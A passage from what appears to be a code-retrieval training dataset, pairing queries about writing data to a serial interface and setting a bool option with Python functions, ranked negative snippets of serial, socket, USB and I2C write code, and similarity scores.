"0.6557061",
"0.65287864",
"0.6526724",
"0.650409",
"0.6499726",
"0.6484594",
"0.6483244",
"0.64595467",
"0.6445724",
"0.6421115",
"0.64190924",
"0.639229",
"0.63841844",
"0.63290405",
"0.63272965",
"0.6326819",
"0.6325473",
"0.6276665",
"0.6259761",
"0.6257517",
"0.62531996",
"0.6225641",
"0.6212478",
"0.62091583",
"0.619777",
"0.6188115",
"0.6170699",
"0.61639786",
"0.61630696",
"0.615248",
"0.61483914",
"0.61390716",
"0.6125692",
"0.61166143",
"0.61131835",
"0.60861045",
"0.6081972",
"0.60746944",
"0.6063353",
"0.6056509",
"0.60519034",
"0.6045715",
"0.6041871",
"0.603988",
"0.60337406",
"0.6025514",
"0.6019147",
"0.6015582",
"0.6006953",
"0.6004283",
"0.5997777",
"0.59965664",
"0.59727114",
"0.59698206",
"0.59544116",
"0.5941842",
"0.5940685",
"0.5930534",
"0.5926643",
"0.5926615",
"0.5921178",
"0.5920802",
"0.58992475",
"0.58965087",
"0.58868635",
"0.5871683",
"0.5861387",
"0.5861267",
"0.58544296",
"0.5851135",
"0.5827961",
"0.5824592",
"0.5824184",
"0.5822255",
"0.58204967",
"0.5810291",
"0.5806735",
"0.5801447",
"0.5792541",
"0.578439",
"0.5778896",
"0.5776895",
"0.577534",
"0.57688946",
"0.5768597",
"0.5754679"
] | 0.66642123 | 12 |
Write data to the serial interface. Raises an IOError if not connected. | def s_write(self, data):
self.s.flushOutput()
if self.s.is_open:
try:
self.s.write(data)
if self.log_output:
self.logfile.write('\nIN :' + str(len(data)) + '[' + hexlify(data) + ']' + '\n')
except Exception as e:
print("Could not write to port " + str(e))
else:
raise IOError('Comport is not open, use ctl_connect()') | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def write(self, data):\n try:\n self.ser.write(data)\n except SerialException as se:\n log.debug('Serial connection write error: {}'.format(se))",
"def serial_write(data):\n global ser\n if ser.writable():\n ser.write(data)\n else:\n print 'The serial', ser.portstr, 'cannot be written.'",
"def write(self, data):\n try:\n self.arduino.write(data)\n except Exception:\n raise",
"def write(self, data):\n if self.EMULATOR_MODE:\n self.protocol.sigRecvdMoveOK.emit()\n return\n\n # Check if serial connection is active and error if not\n if not self.serial or not self.serial.writable():\n self.protocol.sigRecvdHWError.emit()\n else:\n self._lock.lock()\n self.serial.write(data)\n self._lock.unlock()",
"def write(self, data):\n self._check_not_closed()\n raise io.UnsupportedOperation(\"Write not supported\")",
"def send(self, data):\r\n\r\n self._serial_object.write(data)",
"def callback_serial_write(data):\n serial_write(data.data)",
"def writeSomeData(self, data):\n raise IOError(\"Input device is read-only!\")",
"def write(self, data):\n try:\n self._conn.send(data)\n except OSError as exc:\n raise TS3ConnectionClosedException(OSError) from exc",
"def write(self, data):\n _check_init()\n self._check_open()\n\n self._output.Write(data)",
"def write(self, data):\n with self.writing:\n raise NotImplementedError()",
"def _write(self, data):\n if not self.connected:\n raise IOError(\"Not connected.\")\n\n if len(data + b'\\r\\n') > self.MAX_MESSAGE_SIZE:\n logger.error(\n \"A message wasn't sent to %r because it was larger than %d \"\n \"bytes (that is MAX_MESSAGE_SIZE). Consider raising that \"\n \"value if the message seemed legit.\", self._repr_remote(),\n self.MAX_MESSAGE_SIZE)\n # No need to call finalize.\n raise IOError(\"Message too long.\")\n\n try:\n with self._write_lock:\n if not self.connected:\n raise IOError(\"Not connected.\")\n # Does the same as self._socket.sendall.\n self._writer.write(data + b'\\r\\n')\n self._writer.flush()\n except socket.error as error:\n self.finalize(\"Write failed.\")\n logger.warning(\"Failed writing to socket: %s.\", error)\n raise error",
"def write(self, data):\n raise NotImplementedError()",
"def write(self, data: bytes) -> Tuple[int, StatusCode]:\n logger.debug(\"Serial.write %r\" % data)\n end_out, _ = self.get_attribute(ResourceAttribute.asrl_end_out)\n send_end, _ = self.get_attribute(ResourceAttribute.send_end_enabled)\n\n if end_out in (SerialTermination.none, SerialTermination.termination_break):\n pass\n elif end_out == SerialTermination.last_bit:\n last_bit, _ = self.get_attribute(ResourceAttribute.asrl_data_bits)\n mask = 1 << (last_bit - 1)\n data = bytes(iter_bytes(data, mask, send_end))\n\n elif end_out == SerialTermination.termination_char:\n term_char, _ = self.get_attribute(ResourceAttribute.termchar)\n data = data + common.int_to_byte(term_char)\n\n else:\n raise ValueError(\"Unknown value for VI_ATTR_ASRL_END_OUT: %s\" % end_out)\n\n try:\n count = self.interface.write(data)\n\n if end_out == SerialTermination.termination_break:\n logger.debug(\"Serial.sendBreak\")\n self.interface.sendBreak()\n\n return count, StatusCode.success\n\n except serial.SerialTimeoutException:\n return 0, StatusCode.error_timeout",
"def write(self, data: bytes) -> None:\n self.device.write(binascii.unhexlify(data))",
"def write(self, data):\n with self._write_lock:\n self.socket.send(data)",
"def _write(self, data):\n self._writer.write(data)",
"def write(self, data: str) -> None:\n # Nothing to write as this is a headless driver.",
"def _write(self, location, data):\n self._connector.write(location=location, data=data)",
"def send_command(self):\n if self.serial.is_open:\n try:\n # Unicode strings must be encoded\n data = bytes(self.command + '\\r\\n', encoding='utf-8')\n self.serial.flushInput()\n self.serial.write(data)\n except Exception as ex:\n self.handle_serial_error(ex)\n else:\n raise IOError('Try to send data when the connection is closed')",
"def write(self, data):\n self._write_lock.acquire()\n try:\n self.socket.sendall(data)\n finally:\n self._write_lock.release()",
"def _write_v1(self, data):\n return self.usb_dev.write(self.ep_out, data, self.interface, self.usb_wr_timeout)",
"def write(self, data: bytes) -> None:\n pass",
"def __write(self, data):\n return self.__descriptor.write(data.encode(\"utf-8\") + b'\\n')",
"def __write(self, cmd):\n\n if self.__port:\n cmd += b\"\\r\\n\" # terminate\n print(\"write: \" + repr(cmd))\n self.__port.flushInput() # dump everything in the input buffer\n self.__port.write(cmd) # turn the string into bytes and write\n self.__port.flush() # wait for the output buffer to finish transmitting\n else:\n print(\"cannot perform __write() when unconnected\")",
"def write(self, data):\n return 0",
"def write(self, data: bytes):\n self._writer.write(data)",
"def write(self, payload, log=False):\n try:\n if self.serial:\n self.serial.write(payload.encode(\"utf-8\"))\n if log:\n self.logger.prn_txd(payload)\n return True\n except SerialException as e:\n self.serial = None\n self.LAST_ERROR = \"connection lost, serial.write(%d bytes): %s\" % (\n len(payload),\n str(e),\n )\n self.logger.prn_err(str(e))\n return False",
"def write(self, data):\r\n try:\r\n char_handle = self._stdinout_characteristic.getHandle()\r\n bytes_sent = 0\r\n while bytes_sent < len(data):\r\n # Computing data to send.\r\n bytes_to_send = min(\r\n self._MAXIMUM_MESSAGE_SIZE_BYTES,\r\n len(data) - bytes_sent\r\n )\r\n data_to_send = data[bytes_sent:bytes_sent + bytes_to_send]\r\n\r\n # Writing data.\r\n self._node.writeCharacteristic(\r\n char_handle,\r\n data_to_send,\r\n True)\r\n bytes_sent += bytes_to_send\r\n\r\n # Calling on-write callback for a debug characteristic.\r\n self.on_write_characteristic(\r\n self._stdinout_characteristic, data_to_send, True)\r\n\r\n return bytes_sent\r\n\r\n except BTLEException as e:\r\n self._node._unexpected_disconnect()",
"def write(self, msg):\n # Transmit messages using the serial connection. Encodes strings to byte-arrays\n self.Serial.write(msg.encode('ascii'))",
"def write(self, filename, data):\n raise NotImplementedError",
"def write(self, data, **kwargs):\n audit_msg = kwargs.get(\"audit_msg\", None)\n who_send = kwargs.get(\"who_send\", None)\n is_hexa = kwargs.get(\"is_hexa\", False)\n\n if(self._type_connection == \"COM\"):\n self._connection.write(data)\n else:\n msg = \"99, Error al enviar por la conexion {}\".format(self._type_connection)\n raise ValueError(msg)\n\n if(is_hexa and audit_msg):\n transa_log(data, is_hexa_data=is_hexa, who_send=who_send)\n transa_log(audit_msg)\n elif(is_hexa and not audit_msg):\n transa_log(data, is_hexa_data=is_hexa, who_send=who_send)",
"def write(self, data):\n if self.closed:\n raise ConnectionResetError(\n 'Transport closed - cannot write on %s' % self\n )\n else:\n t = self.transport\n if self._paused or self._buffer:\n self._buffer.appendleft(data)\n self._buffer_size += len(data)\n self._write_from_buffer()\n if self._buffer_size > 2 * self._b_limit:\n if self._waiter and not self._waiter.cancelled():\n self.logger.warning(\n '%s buffer size is %d: limit is %d ',\n self._buffer_size, self._b_limit\n )\n else:\n t.pause_reading()\n self._waiter = self._loop.create_future()\n else:\n t.write(data)\n self.changed()\n return self._waiter",
"def write_data(self, data):\n print('Wrote %d bytes' % (len(data)))",
"def write(self, data, timeout=None):\n assert self._locked\n\n if timeout is None:\n timeout = self.timeout\n self.ep_data_out.write(data, self.timeout)",
"def write(self, data):\n\t\tself.outputbuffer.write(data)",
"def _serial_write(self, values_to_write):\n if self.verbose:\n self.log(\"Writing 0x{:x} to serial port...\".format(values_to_write))\n if type(values_to_write) is not list:\n self.serial.write(bytearray([values_to_write]))\n else:\n self.serial.write(bytearray(values_to_write))",
"def async_write(self, data) -> None:\n if data and self.__is_active:\n # logging.info('async_write: ' + str(data))\n self.__client_socket.async_write_all(data, self.__async_write_callback)\n\n # logging.info('async_write done')",
"def _write_v2(self, data):\n return self.usb_dev.write(self.ep_out, data, self.usb_wr_timeout)",
"def write(self, data, handle=None):\n if not isinstance(data, (bytes, bytearray, memoryview)):\n raise TypeError(\"data: expecting a bytes-like instance, got {!r}\"\n .format(type(data).__name__))\n if handle is not None and not isinstance(self._handle, pyuv.Pipe):\n raise ValueError('handle: can only be sent over pyuv.Pipe')\n self._check_status()\n if not self._writable:\n raise TransportError('transport is not writable')\n if self._closing:\n raise TransportError('transport is closing')\n try:\n if handle:\n self._handle.write(data, self._on_write_complete, handle)\n else:\n self._handle.write(data, self._on_write_complete)\n except pyuv.error.UVError as e:\n self._error = TransportError.from_errno(e.args[0])\n self.abort()\n raise compat.saved_exc(self._error)\n # We only keep track of the number of outstanding write requests\n # outselves. See note in get_write_buffer_size().\n self._write_buffer_size += 1\n self._maybe_pause_protocol()",
"def put(self,data):\n\n\t\tself.fd.write(str(data))\n\t\treturn 1",
"def send_data(self, data):\n self._transport.write(data)",
"def write(self, data):\n return self._write(self.wfile, data)",
"def _write(self, data):\n\n ret = False\n extended_address = SettingsBase.get_setting(self, \"extended_address\")\n addr = (extended_address, 0xe8, 0xc105, 0x11)#prey this works, I can't test it...\n try:\n self.__xbee_manager.xbee_device_xmit(0xe8, data, addr)\n ret = True\n print \"success!\" #\n except:\n print \"(..., 0xc105, 0x11) faild, trying (..., 0, 0)\" #\n try: #\n addr = (extended_address, 0xe8, 0, 0) #\n self.__xbee_manager.xbee_device_xmit(0xe8, data, addr) #\n ret = True #\n print \"success!\" #\n except: #\n print \"(..., 0, 0) faild\" #\n pass\n return ret",
"def write(self, index, data):\n isNotFirstCmd = False\n # Write Opcode\n self.__ser_wr_trans(RG_WR, isNotFirstCmd)\n isNotFirstCmd = True\n # Write Address\n self.__ser_wr_trans(index, isNotFirstCmd)\n # Write Data\n self.__ser_wr_trans(data, isNotFirstCmd)",
"def write(self, message):\n\n if self.multi_command is not None:\n log.debug(\n 'Writing to multi-command buffer for device \"{0}\": {1!r}'.format(self.name, message))\n\n self.multi_command.append(message)\n return\n\n log.debug('Writing to device \"{0}\": {1!r}'.format(self.name, message))\n\n if self.driver == drivers.pyvisa:\n try:\n self.device.write(message)\n except pyvisa.VisaIOError as e:\n if e.error_code == pyvisa.errors.VI_ERROR_TMO:\n print(\"In pyvisa timeout error\")\n raise DeviceTimeout(e)\n else:\n raise\n\n elif self.driver == drivers.telnet:\n try:\n self.device.write(message)\n except Exception:\n if e is socket.timeout:\n raise DeviceTimeout(e)\n else:\n raise\n\n elif self.driver == drivers.requests:\n r = requests.get(self.request_address + message)\n if r.status_code != 200:\n raise Exception(\"Write did not work\")\n\n elif self.driver == drivers.lgpib:\n try:\n self.device.write(message)\n except gpib.GpibError as e:\n if 'timeout' in e.message:\n raise DeviceTimeout(e)\n else:\n raise\n\n elif self.driver == drivers.pyvisa_usb:\n # Send the message raw.\n if not (legacyVisa):\n self.device.write_raw(message)\n else:\n pyvisa.vpp43.write(self.device.vi, message)\n\n else:\n print(\"Passed without writing\")",
"def writeToSerial( self, message ):\n self.checkConnection()\n self.ser.write( message )\n resp = yield self.ser.read( len( RESP_STRING ) )\n if RESP_STRING != resp:\n# Since we didn't get the the correct response,\n# place the value back in the front of the queue\n# and wait for a specified ERROR_TIME before\n# checking the queue again.\n if self.error_count > MAX_ERROR_COUNT:\n raise Exception (\"Too many communciation errors\")\n self.queue.insert( 0, message )\n self.error_count += 1\n reactor.callLater( ERROR_TIME, self.checkQueue )\n print 'Correct response from DC box not received, sleeping for short period'\n else:\n #got the correct response, clear the erros, moving on\n self.error_count = 0\n self.checkQueue()",
"def write( data ):",
"def write(self, data):\n self.buffer.write(data)\n self.offset += len(data)",
"def write(self, data, timeout_ms=0):\n if not self.is_valid():\n return 0\n if isinstance(self.__usb_dev, MpUsbApi):\n num = self.__usb_dev.MPUSBWrite(self.__handle_write, data, timeout_ms)\n else:\n num = self.__usb_dev.write(1, data, timeout_ms)\n return num\n #end write()",
"def write(self, device_id, address, data = None, mem_device = False):\n raise AssertionError(\"write function is not implemented\")",
"def writeLine(self, data):\n raise NotImplementedError()",
"def open_serial(self):\n self.port = serial.Serial(\n self.device,\n baudrate=SERIAL_BAUD,\n timeout=5.0,\n bytesize=serial.EIGHTBITS,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n xonxoff=False,\n rtscts=False,\n dsrdtr=False)\n\t\n self.port.flushInput()\n self.port.flushOutput()",
"def _write(self, s):\n try:\n self._sock.sendall(s)\n except socket.error, e:\n if e.args[0] == 32:\n # broken pipe\n self.disconnect()\n raise ConnectionError(\"Error %s while writing to socket. %s.\" % tuple(e.args))",
"def write(self, data: Union[str, bytes]) -> None:\n ...",
"def writer(self):\n while self.alive:\n try:\n if controlEvent.isSet() == False:\n self.alive = False\n self.thread_read.join()\n break\n data = self.socket.recv(1024)\n if not data:\n break\n #if self.ser_newline and self.net_newline:\n # do the newline conversion\n # XXX fails for CR+LF in input when it is cut in half at the begin or end of the string\n #data = ser_newline.join(data.split(net_newline))\n # Only send data to serial if it is in active state\n if controlEvent.isSet() == True:\n self.serial.write(data) # get a bunch of bytes and send them\n # the spy shows what's on the serial port, so log it after converting newlines\n if self.spy:\n sys.stdout.write(codecs.escape_encode(data)[0])\n sys.stdout.flush()\n except socket.timeout:\n continue\n except socket.error, msg:\n sys.stderr.write('writer socket.error: %s\\n' % msg)\n # probably got disconnected\n break\n except IOError, msg:\n sys.stderr.write('writer IOError: %s\\n' % msg)\n except Exception, msg:\n sys.stderr.write('writer Other Exception: %s\\n' % msg)\n #self.alive = False",
"def send_serial_command(data):\n print(data)\n serial_command = data\n SERIAL_PARENT.send(serial_command)\n OUTGOING.append(serial_command)",
"async def write(self, data: bytes):\n while data:\n await self.wait_for_write()\n try:\n sent = self.socket.send(data)\n except OSError as e:\n self.logger.debug(\"Failed to write: %s\", e)\n raise asyncio.TimeoutError()\n data = data[sent:]",
"def write(data):",
"def write(self, data, timeout_ms=None, **kwargs):\n raise NotImplementedError(\"implement in derived transport class\")",
"def _write_and_flush(self, data):\n try:\n self.stdout.write(data)\n self.stdout.flush()\n except IOError as e:\n if e.args and e.args[0] == errno.EINTR:\n # Interrupted system call. Can happpen in case of a window\n # resize signal. (Just ignore. The resize handler will render\n # again anyway.)\n pass\n else:\n raise",
"def close_serial(self):\n if(self.serial):\n self.serial.flush()\n self.serial.close()\n self.serial = False",
"def Send(self, data):\n # TODO(josephsih): should have a method to check the connection status.\n # Currently, once RN-42 is connected to a remote host, all characters\n # except chr(0) transmitted through the serial port are interpreted\n # as characters to send to the remote host.\n logging.debug('HID device sending %r...', data)\n self.SerialSendReceive(data, msg='BluetoothHID.Send')\n time.sleep(self.send_delay)",
"def write(self, addr, data, control):\n if not self._is_u32(addr):\n raise ValueError('The addr parameter must be an unsigned 32-bit value.')\n\n if not self._is_valid_buf(data):\n raise ValueError('The data parameter must be a sequence type with at least one item.')\n\n if not self._is_bool(control):\n raise ValueError('The control parameter must be a boolean value.')\n\n addr = ctypes.c_uint32(addr)\n data_len = ctypes.c_uint32(len(data))\n data = (ctypes.c_uint8 * data_len.value)(*data)\n control = ctypes.c_bool(control)\n\n result = self._lib.NRFJPROG_write(addr, ctypes.byref(data), data_len, control)\n if result != NrfjprogdllErr.SUCCESS:\n raise APIError(result)",
"def qspi_write(self, addr, data):\n if not self._is_u32(addr):\n raise ValueError('The addr parameter must be an unsigned 32-bit value.')\n \n if not self._is_valid_buf(data):\n raise ValueError('The data parameter must be a sequence type with at least one item.')\n \n addr = ctypes.c_uint32(addr)\n data_len = ctypes.c_uint32(len(data))\n data = (ctypes.c_uint8 * data_len.value)(*data)\n \n result = self._lib.NRFJPROG_qspi_write(addr, ctypes.byref(data), data_len)\n if result != NrfjprogdllErr.SUCCESS:\n raise APIError(result)",
"def write_to_serial(self, string):\n serialcmd = string + self._line_terminator\n self._ser.write(serialcmd.encode())\n time.sleep(self._sleep_time)",
"def write(self, data_to_write):\n self.single_file.write(data_to_write)\n self.single_file.flush()",
"def SERIAL_SEND_cmd(self, cmd):\n # Must be connected & operational\n if self.State == 0:\n # a slightly more informative result might help\n return \n\n # SEND\n if self.Port.writable():\n #print \"\\nwriting \" + cmd + \" to port...\"\n for c in str(cmd):\n self.Port.write(c)\n self.Port.write(\"\\r\\n\")\n\n return",
"def Test_serial_write(self, mock_serial_port):\n self.portdetect = ['ttyUSB0', 'ttyUSB1']\n self.baudrate = 9600\n port = serial_port_connection(self.portdetect, baudrate=self.baudrate)\n # serial_write called with a dummy character\n Test_object.serial_write('p')\n \"\"\"\n testing whether serial.write of the Pyserial api\n is called with right arguments\n \"\"\"\n mock_serial_port.return_value.write.assert_called_once_with('p')\n data_buffer = []\n \"\"\"\n calling config register and checking whether\n serial.write of Pyserial has appropriate calls\n \"\"\"\n data_buffer = Test_object.config_register('DDRA', Pins=[3],\n set_pins=True)\n expected = [mock.call(x) for x in data_buffer]\n port.write.assert_has_calls(expected)",
"def write( self, data ):\n os.write( self.stdin.fileno(), data )",
"def send(self, data):\n self._serial.write('spi = SPI(2, SPI.SLAVE, baudrate=500000, polarity=0, phase=0)\\r\\n'.encode('utf-8'))\n self._serial.write('data=bytearray({})\\r\\n'.format(data).encode('utf-8'))\n self._serial.write('spi.send(data, timeout=50000)\\r\\n'.encode('utf-8'))\n sleep(1)",
"def _write(self, register, data):\n\n # data: list of bytes to write to register\n assert register in _registers, '%r is not a valid register. Register must be passed as string.' %register\n assert len(data) == _register_len[register], 'Must pass %r byte(s) to %r register.' %(_register_len[register], register)\n\n # send the register we want to write to\n self.spi.writebytes([_registers[register]])\n\n # send the bytes we write to the register\n self.spi.writebytes(data)",
"def write_data(self, data):\n ofs = 0\n size = len(data)\n try:\n while ofs < size:\n # how many bytes should we write?\n wr_size = self.wrbuf_chunksize\n if wr_size > size - ofs:\n # reduce the write size\n wr_size = size - ofs\n # write the bytes\n n = self._write(data[ofs : ofs + wr_size])\n if n <= 0:\n raise usbdev_error(\"USB bulk write error\")\n ofs += n\n # return the number of bytes written\n return ofs\n except usb.core.USBError as e:\n raise usbdev_error(str(e))",
"def write(self, data, meta):\n raise NotImplementedError",
"def write(self, address, data, progress_update=None):\n size_remain = len(data)\n\n while size_remain > 0:\n if progress_update is not None:\n progress_update(\n int(100 * (len(data) - size_remain) / len(data)))\n\n part_size = self.__RW_MAX_SIZE \\\n if size_remain > self.__RW_MAX_SIZE else size_remain\n offset = address + len(data) - size_remain\n\n for retry in range(0, self.__RETRY_MAX_NUM):\n self._send_command(self.__COMMAND['write memory'])\n self._set_address(offset)\n\n chunk = data[offset - address:offset - address + part_size]\n checksum = 0xff & ((part_size - 1) ^ self._checksum(chunk))\n\n bytes_sent = self._port_handle.write(bytearray([part_size - 1]))\n if bytes_sent != len(bytearray([part_size - 1])):\n raise DfuException('Tried to send {} bytes, {} was '\n 'sent.'.format(\n len(bytearray([part_size - 1])),\n bytes_sent))\n\n bytes_sent = self._port_handle.write(chunk)\n if bytes_sent != len(chunk):\n raise DfuException('Tried to send {} bytes, {} was '\n 'sent.'.format(len(chunk), bytes_sent))\n\n bytes_sent = self._port_handle.write(bytearray([checksum]))\n if bytes_sent != len(bytearray([checksum])):\n raise DfuException('Tried to send {} bytes, {} was '\n 'sent.'.format(\n len(bytearray([checksum])),\n bytes_sent))\n\n if self._is_acknowledged():\n break\n else:\n raise DfuException('Write memory at {} failed after {} '\n 'retries.'.format(offset, retry + 1))\n\n size_remain -= part_size\n\n if progress_update is not None:\n progress_update(100)",
"def write_led(my_bus, d0, d1, d2, d3):\n data = [d0, 0x00, d1, 0x00, 0x00, 0x00, d2, 0x00, d3, 0x00]\n\n try:\n my_bus.write_i2c_block_data(LED_DEVICE_ADDRESS, 0x00, data)\n except IOError:\n t = 0.1\n print(\"got IOError. try again in\", t, \"second\")\n time.sleep(t)",
"def __write_command(serial_port, command):\n line_ending = \"\\r\\n\"\n ctrl_c_cmd = \"\\x03\" + line_ending\n\n # Clear any existing text by sending a CTRL-C\n # command and waiting for a prompt\n serial_port.write(ctrl_c_cmd.encode(\"utf-8\"))\n Cambrionix.__get_response(serial_port)\n\n if not command.endswith(line_ending):\n command += line_ending\n\n for char in command:\n serial_port.write(char.encode(\"utf-8\"))\n if command.startswith(\"reboot\") and char == \"\\r\":\n break\n\n while True:\n ready = select.select([serial_port], [], [], 25)[0]\n if ready:\n if serial_port.read(1).decode(\"utf-8\") == char:\n break\n else:\n raise errors.DeviceError(\"Device cambrionix write command failed. \"\n \"Read timeout on serial port: {} \"\n \"while writing command: {}\".format(\n serial_port, command))",
"def write(self, endpoint, data):\n return self.device.write(endpoint, data)",
"def send_to_port(self):\r\n time.sleep(2)\r\n # ser.write(\"R\".encode())\r\n ser.flush()\r\n ser.write(\"{},{},{},{},{}\".format(self.x_Pos, self.y_Pos, self.t_Tap, self.U_on, self.u_off).encode())\r\n # ser.flush()\r\n # while (1 == 1):\r\n # mydata = ser.readline().lstrip()\r\n # print(mydata.decode('utf-8'))\r\n # value = str(mydata)\r",
"def write(self,command,ser = None):\n if ser is None:\n ser = self.ser\n if ser is not None:\n self.flush(ser = ser)\n ser.write(command)\n debug(\"%s: Sent %r\" % (ser.name,command))",
"def _write_i2c(fd, buf):\n w = os.write(fd, buf)\n if len(buf) != w:\n raise OSError(errno.EIO, os.strerror(errno.EIO))",
"def write(self, filename, data, hdr):\n pass",
"def send(self, data):\n \n try:\n self.s.send(data)\n LED.blink(2, 0.1, 0x00ff00)\n print(\"Sending data:\")\n print(data)\n except OSError as e:\n if e.errno == 11:\n print(\"Caught exception while sending\")\n print(\"errno: \", e.errno)\n \n LED.off()\n data = self.s.recv(64)\n print(\"Received data:\", data)\n\n return data",
"def write_data(self, data):\n print \"Writing data...\"\n # Write data into log\n self.log.write_file(data)\n\n # Close log so information can be sent\n self.log.close_log()",
"def write_firmware(self, data):\n self.check_validity()\n\n data = list(map(int, data))\n\n return self.ipcon.send_request(self, BrickletIndustrialDualAnalogInV2.FUNCTION_WRITE_FIRMWARE, (data,), '64B', 9, 'B')",
"def __transfer(self, data: int):\n self.__spi.writebytes(data)",
"def write(self, filename, data):\n owner_rw = 0600\n fd = os.open(filename, os.O_WRONLY | os.O_CREAT, owner_rw)\n # In case file existed already with wrong permissions, fix them.\n os.chmod(filename, owner_rw)\n os.write(fd, data)\n os.close(fd)",
"def _write(self, data, length, error, move_start=True):\n idxs = self.get_indexes(self._end, length, self.maxsize)\n self.move_end(length, error, move_start)\n self._data[idxs] = data",
"def connect(self):\n # open serial port\n try:\n #device = self.get_device_name(self.serial_number)\n device = \"/dev/ttyAMA0\"\n self.serial.port = device\n # Set RTS line to low logic level\n self.serial.rts = False\n self.serial.open()\n except Exception as ex:\n self.handle_serial_error(ex)",
"def write(self, value):\n if self.mode is UNAVAILABLE:\n raise IOError, \"%s can not be used through Firmata\" % self\n if self.mode is INPUT:\n raise IOError, \"%s is set up as an INPUT and can therefore not be written to\" % self\n if value is not self.value:\n self.value = value\n if self.mode is OUTPUT:\n if self.port:\n self.port.write()\n else:\n msg = chr(DIGITAL_MESSAGE)\n msg += chr(self.pin_number)\n msg += chr(value)\n self.board.sp.write(msg)\n elif self.mode is PWM:\n value = int(round(value * 255))\n msg = chr(ANALOG_MESSAGE + self.pin_number)\n# print(value)\n msg += chr(value % 128)\n msg += chr(value >> 7)\n self.board.sp.write(msg)\n elif self.mode is SERVO:\n value = int(value)\n msg = chr(ANALOG_MESSAGE + self.pin_number)\n msg += chr(value % 128)\n msg += chr(value >> 7)\n self.board.sp.write(msg)",
"def send_data(self, data: int):\n self.write_pin(self.DC_PIN, RPi.GPIO.HIGH)\n self.__transfer([data])",
"def write_firmware(self, data):\n data = list(map(int, data))\n\n return self.ipcon.send_request(self, BrickletBarometerV2.FUNCTION_WRITE_FIRMWARE, (data,), '64B', 'B')",
"def i2c_write(self, addrs, data):\n buf = [0x00, 0x90]\n self._i2c_write(addrs, data, buf)",
"def _write(self, s):\n self.fh.write(s)\n self.fh.flush()",
"def write_data(self, data, response_required=None, timeout=5.0, raw=False):\n if self._transport is None:\n return\n\n if self._paused:\n return\n\n if self._waiting_for_response:\n LOG.debug(\"queueing write %s\", data)\n self._queued_writes.append((data, response_required, timeout))\n return\n\n if response_required:\n self._waiting_for_response = response_required\n if timeout > 0:\n self._timeout_task = self.loop.call_later(\n timeout, self._response_required_timeout\n )\n\n if not raw:\n cksum = 256 - reduce(lambda x, y: x + y, map(ord, data)) % 256\n data = data + \"{:02X}\".format(cksum)\n if int(data[0:2], 16) != len(data) - 2:\n LOG.debug(\"message length wrong: %s\", data)\n\n LOG.debug(\"write_data '%s'\", data)\n self._transport.write((data + \"\\r\\n\").encode())",
"def write(self, data: str):\n self.out_file.write(f\"{data}\\n\")",
"def writedata(self,filename_): # 3\n res = self.__obj.writedata(filename_)\n if res != 0:\n result,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)",
"def _write_at(self, data, offset):\n n_data = len(data)\n bytes_written = 0\n while bytes_written < n_data:\n available = min(\n n_data - bytes_written,\n self.channel.connection.credits * smb2.BYTES_PER_CREDIT,\n self.channel.connection.negotiate_response.max_write_size,\n )\n chunk = data[bytes_written : bytes_written + available]\n count = self.channel.write(self, offset + bytes_written, chunk)\n bytes_written += count\n if bytes_written:\n self._offset += bytes_written\n # update the EOF marker if we write past it\n self._end_of_file = max(self.end_of_file, self._offset)\n return bytes_written",
"def write_cmd(self, address, data, d_width=4, d_length=1, timeout=10):\n # Write the address and data\n self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_ADDR_OFFSET,\n address)\n self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_DATA_OFFSET,\n data)\n\n # Build the write command\n cmd_word = get_cmd_word(WRITE_CMD, d_width, d_length)\n self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_CMD_OFFSET,\n cmd_word)\n\n # Wait for ACK in steps of 1ms\n countdown = timeout\n while not self.is_cmd_mailbox_idle() and countdown > 0:\n time.sleep(0.001)\n countdown -= 1\n\n # If ACK is not received, alert users.\n if countdown == 0:\n raise RuntimeError(\"ArduinoDevMode write_cmd() not acknowledged.\")",
"def write(self, data):\n line = pkt_line(data)\n line_len = len(line)\n over = self._buflen + line_len - self._bufsize\n if over >= 0:\n start = line_len - over\n self._wbuf.write(line[:start])\n self.flush()\n else:\n start = 0\n saved = line[start:]\n self._wbuf.write(saved)\n self._buflen += len(saved)"
] | [
"0.8171523",
"0.8080821",
"0.742356",
"0.72597915",
"0.7125678",
"0.69886917",
"0.69797105",
"0.6972711",
"0.6927657",
"0.6772062",
"0.6589696",
"0.6576141",
"0.64458084",
"0.6434454",
"0.635318",
"0.6322469",
"0.631071",
"0.6309109",
"0.62654054",
"0.6261372",
"0.6193785",
"0.61737937",
"0.6171418",
"0.6134486",
"0.6133845",
"0.61274725",
"0.6096332",
"0.6047607",
"0.6045882",
"0.6017959",
"0.59743047",
"0.59608537",
"0.5958651",
"0.5946047",
"0.5941867",
"0.59393984",
"0.59254056",
"0.5903805",
"0.5901545",
"0.5894963",
"0.58890563",
"0.58841354",
"0.58736384",
"0.5845307",
"0.57773",
"0.5755511",
"0.574005",
"0.57337034",
"0.5715802",
"0.57127273",
"0.570951",
"0.5700808",
"0.5690709",
"0.5680718",
"0.56617117",
"0.5641741",
"0.56403786",
"0.5638689",
"0.5637695",
"0.562396",
"0.562207",
"0.5621177",
"0.56131965",
"0.5608423",
"0.5596521",
"0.5590329",
"0.55900544",
"0.5589672",
"0.5588943",
"0.55886406",
"0.55817634",
"0.557666",
"0.5566234",
"0.556035",
"0.5550353",
"0.5546896",
"0.55386573",
"0.5532684",
"0.55310935",
"0.5527217",
"0.55203515",
"0.5518867",
"0.5518189",
"0.5504835",
"0.54965854",
"0.54940706",
"0.54771215",
"0.54638344",
"0.54612243",
"0.5460613",
"0.5459908",
"0.54598963",
"0.5456954",
"0.5453191",
"0.5451075",
"0.5451072",
"0.5438785",
"0.5437804",
"0.5434273",
"0.5433909"
] | 0.75385743 | 2 |
Set a bool option. | def get_bools_array(self, bools, limit):
bit_array = bytearray()
bits_array_length = (limit) // 8
for x in range(bits_array_length):
bit_array.append(0)
for x in range(limit):
# set the bits
if bools[x]['value'] == True:
index = x//8
bit = x % 8
bit_array[index] |= 1 << bit
return bit_array | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def setBooleanOption(self, option, value):\n result = self.__lib.voikkoSetBooleanOption(self.__handle, option, _boolToInt(value))\n if result == 0:\n raise VoikkoException(\"Could not set boolean option %s to value %s\" % (option, value))",
